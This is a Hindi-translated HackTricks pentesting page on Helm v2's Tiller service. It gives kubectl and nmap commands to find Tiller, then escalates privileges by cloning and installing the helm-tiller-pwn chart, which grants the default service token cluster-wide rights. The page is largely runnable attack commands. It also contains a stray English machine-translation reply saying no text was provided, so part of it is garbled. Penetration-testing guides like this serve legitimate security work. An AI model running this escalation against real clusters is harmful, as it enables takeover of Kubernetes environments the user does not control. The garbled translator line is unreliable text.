hacktricks/network-services-pentesting/44134-pentesting-tiller-helm.md

83 lines
8.4 KiB
Markdown

<details>
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें**](https://peass.creator-spring.com)
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का अनुसरण करें**.
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें.
</details>
# मूल जानकारी
Helm Kubernetes के लिए **पैकेज मैनेजर** है। यह YAML फाइलों को पैकेज करने और उन्हें सार्वजनिक और निजी रिपोजिटरीज में वितरित करने की अनुमति देता है। इन पैकेजों को **Helm Charts** कहा जाता है। **Tiller** एक **सेवा** है जो डिफ़ॉल्ट रूप से पोर्ट 44134 पर **चल रही** होती है जो सेवा प्रदान करती है।
**डिफ़ॉल्ट पोर्ट:** 44134
```
PORT STATE SERVICE VERSION
44134/tcp open unknown
```
# सूचीकरण
यदि आप **पॉड्स और/या सेवाओं का सूचीकरण** विभिन्न नामस्थानों में कर सकते हैं, तो उन्हें सूचीबद्ध करें और **"tiller" नाम वाले** लोगों की खोज करें:
```bash
kubectl get pods | grep -i "tiller"
kubectl get services | grep -i "tiller"
kubectl get pods -n kube-system | grep -i "tiller"
kubectl get services -n kube-system | grep -i "tiller"
kubectl get pods -n <namespace> | grep -i "tiller"
kubectl get services -n <namespace> | grep -i "tiller"
```
Since you haven't provided any specific text to translate, I can't proceed with a translation. Please provide the English text you want to be translated into Hindi, and I'll be happy to assist you.
```bash
kubectl get pods -n kube-system
NAME READY STATUS RESTARTS AGE
kube-scheduler-controlplane 1/1 Running 0 35m
tiller-deploy-56b574c76d-l265z 1/1 Running 0 35m
kubectl get services -n kube-system
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kube-dns ClusterIP 10.96.0.10 <none> 53/UDP,53/TCP,9153/TCP 35m
tiller-deploy ClusterIP 10.98.57.159 <none> 44134/TCP 35m
```
आप यह भी प्रयास कर सकते हैं कि पोर्ट 44134 की जांच करके यह सेवा चल रही है या नहीं:
```bash
sudo nmap -sS -p 44134 <IP>
```
एक बार जब आप इसे खोज लेते हैं, तो आप इससे संवाद कर सकते हैं क्लाइंट helm एप्लिकेशन डाउनलोड करके। आप `homebrew` जैसे टूल्स का उपयोग कर सकते हैं, या [**आधिकारिक रिलीज़ पेज**](https://github.com/helm/helm/releases)** पर देख सकते हैं।** अधिक जानकारी के लिए, या अन्य विकल्पों के लिए, [स्थापना गाइड](https://v2.helm.sh/docs/using_helm/#installing-helm) देखें।
फिर, आप **सेवा की गणना कर सकते हैं**:
```
helm --host tiller-deploy.kube-system:44134 version
```
## विशेषाधिकार वृद्धि
डिफ़ॉल्ट रूप से **Helm2** को **namespace kube-system** में **उच्च विशेषाधिकारों** के साथ स्थापित किया गया था, इसलिए यदि आपको सेवा मिलती है और इस तक पहुँच है, तो यह आपको **विशेषाधिकार वृद्धि** करने की अनुमति दे सकती है।
आपको बस इतना करना है कि इस तरह का एक पैकेज स्थापित करें: [**https://github.com/Ruil1n/helm-tiller-pwn**](https://github.com/Ruil1n/helm-tiller-pwn) जो **डिफ़ॉल्ट सर्विस टोकन को पूरे क्लस्टर में सब कुछ तक पहुँच प्रदान करेगा।**
```
git clone https://github.com/Ruil1n/helm-tiller-pwn
helm --host tiller-deploy.kube-system:44134 install --name pwnchart helm-tiller-pwn
/pwnchart
```
[http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) में आपके पास **हमले की व्याख्या** है, लेकिन मूल रूप से, यदि आप _helm-tiller-pwn/pwnchart/templates/_ के अंदर [**clusterrole.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrole.yaml) और [**clusterrolebinding.yaml**](https://github.com/Ruil1n/helm-tiller-pwn/blob/main/pwnchart/templates/clusterrolebinding.yaml) फाइलों को पढ़ते हैं, तो आप देख सकते हैं कि कैसे **सभी विशेषाधिकार डिफ़ॉल्ट टोकन को दिए जा रहे हैं**
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ AWS हैकिंग सीखें शून्य से नायक तक</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर मुझे **फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें।
</details>